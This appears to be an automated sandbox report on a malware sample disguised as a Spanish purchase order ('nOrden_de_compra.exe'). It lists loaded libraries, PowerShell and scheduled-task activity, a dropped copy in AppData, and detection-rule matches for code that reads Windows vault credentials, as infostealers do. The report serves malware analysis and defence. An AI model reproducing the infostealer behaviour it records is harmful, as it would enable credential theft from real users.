                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe; Process Stats: CPU usage > 49%
Source: nOrden_de_compra.exe, 00000000.00000002.2116890255.0000000007E10000.00000004.08000000.00040000.00000000.sdmp  Binary or memory string: OriginalFilenameTyrone.dll8 vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe, 00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmp  Binary or memory string: OriginalFilenameGamma.dll8 vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe, 00000000.00000002.2116474951.0000000007160000.00000004.08000000.00040000.00000000.sdmp  Binary or memory string: OriginalFilenameattendant.dll> vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe, 00000000.00000002.2113140924.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: OriginalFilename7d4a0f17-02c7-4030-b32d-7d2fecfc51d2.exe4 vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe, 00000000.00000002.2112238223.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: OriginalFilenameclr.dllT vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe, 00000000.00000002.2113140924.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: OriginalFilenameGamma.dll8 vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: OriginalFilenameattendant.dll> vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: OriginalFilename7d4a0f17-02c7-4030-b32d-7d2fecfc51d2.exe4 vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: OriginalFilenameTyrone.dll8 vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe, 0000000A.00000002.4527068607.0000000000F59000.00000004.00000010.00020000.00000000.sdmp  Binary or memory string: OriginalFilenameUNKNOWN_FILET vs nOrden_de_compra.exe
Source: nOrden_de_compra.exe  Binary or memory string: OriginalFilenamerYwr.exe4 vs nOrden_de_compra.exe
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Section loaded: edputil.dll
Source: nOrden_de_compra.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
